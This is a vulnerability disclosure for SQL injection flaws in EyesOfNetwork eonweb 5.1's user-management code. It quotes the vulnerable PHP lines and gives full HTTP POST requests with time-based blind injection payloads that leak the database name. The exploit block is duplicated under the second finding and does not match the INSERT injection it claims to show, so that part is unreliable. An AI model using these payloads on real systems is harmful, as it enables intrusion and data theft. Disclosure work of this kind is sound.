eonweb_include_function

powered by minhaizhao from Anyuntec

version: 5.1

https://github.com/EyesOfNetworkCommunity/eonweb

Vulnerability details

0x01

/srv/eyesofnetwork/eonweb-5.1/include/function.php Line 745

// Check if user exist
    $user_exist=mysqli_result(sqlrequest("$database_eonweb","SELECT count('user_name') from users where user_name='$user_name';"),0);

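$user_name is not filtered or escaped before it is interpolated into the query string, which allows SQL injection. Binding the value as a parameter of a prepared statement (mysqli_prepare / mysqli_stmt_bind_param) instead of building the query by string interpolation removes the injection point.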

/srv/eyesofnetwork/eonweb-5.1/module/admin_user/add_modify_user.php Line 268

if  (isset($_POST['add']))
    {   
    $create_user_in_nagvis = retrieve_form_data("create_user_in_nagvis","");
    $create_user_in_cacti = retrieve_form_data("create_user_in_cacti","");
    if($create_user_in_nagvis == "yes"){ $nagvis_user = true; }
        else { $nagvis_user = false; }
        if($create_user_in_cacti == "yes"){ $cacti_user = true; }
            else { $cacti_user = false; }
                
                $user_group = retrieve_form_data("user_group","");
                $nagvis_grp = retrieve_form_data("nagvis_group", "");
                $user_id=insert_user(stripAccents($user_name), $user_descr, $user_group, $user_password1, $user_password2, $user_type, $user_location,$user_mail,$user_limitation, true, $create_user_in_nagvis, $create_user_in_cacti, $nagvis_grp, $user_language);

EXP:

POST /module/admin_user/add_modify_user.php HTTP/1.1
Host: 192.168.91.66
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 218
Referer: https://192.168.91.66/module/admin_user/add_modify_user.php
Cookie: session_id=104554405; user_name=admin; user_id=1; user_limitation=0; group_id=1
X-Forwarded-For: 127.0.0.1
Connection: close
Upgrade-Insecure-Requests: 1

user_id=&user_name=123%27+or+sleep(if(ascii(substr(database(),1,1))=101,0,5))%23 &user_name_old=&user_mail=&user_descr=admin&user_password1=admin&user_password2=admin&user_language=0&user_group=1&nagvis_group=3&add=add

term=%' and sleep( if(ascii(substr(database(),1,1))=102,0,5 )) %23

The page will be delayed for 5 seconds

term=%' and sleep( if(ascii(substr(database(),1,1))=101,0,5 )) %23

The page will be delayed for 0 seconds

0x02

/srv/eyesofnetwork/eonweb-5.1/include/function.php Line 769

sqlrequest("$database_eonweb","INSERT INTO users (user_name,user_descr,group_id,user_passwd,user_type,user_location,user_limitation,user_language) VALUES('$user_name', '$user_descr', '$user_group', '$user_password', '$user_type', '$user_location', '$user_limitation', '$user_language')");

$user_name, $user_descr, $user_group, $user_password, $user_type, $user_location, $user_limitation and $user_language are not filtered before they are interpolated into the INSERT statement, which allows SQL injection.

/srv/eyesofnetwork/eonweb-5.1/include/function.php Line 770

$user_id=mysqli_result(sqlrequest("$database_eonweb","SELECT user_id FROM users WHERE user_name='$user_name'"),0,"user_id");

$user_name is not filtered before it is interpolated into the query, which allows SQL injection.

/srv/eyesofnetwork/eonweb-5.1/include/function.php Line 771

$group_name=mysqli_result(sqlrequest("$database_eonweb","SELECT group_name FROM groups WHERE group_id='$user_group'"),0,"group_name");

$user_group is not filtered before it is interpolated into the query, which allows SQL injection.

EXP:

POST /module/admin_user/add_modify_user.php HTTP/1.1
Host: 192.168.91.66
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 218
Referer: https://192.168.91.66/module/admin_user/add_modify_user.php
Cookie: session_id=104554405; user_name=admin; user_id=1; user_limitation=0; group_id=1
X-Forwarded-For: 127.0.0.1
Connection: close
Upgrade-Insecure-Requests: 1

user_id=&user_name=123%27+or+sleep(if(ascii(substr(database(),1,1))=101,0,5))%23 &user_name_old=&user_mail=&user_descr=admin&user_password1=admin&user_password2=admin&user_language=0&user_group=1&nagvis_group=3&add=add

term=%' and sleep( if(ascii(substr(database(),1,1))=102,0,5 )) %23

The page will be delayed for 5 seconds

term=%' and sleep( if(ascii(substr(database(),1,1))=101,0,5 )) %23

The page will be delayed for 0 seconds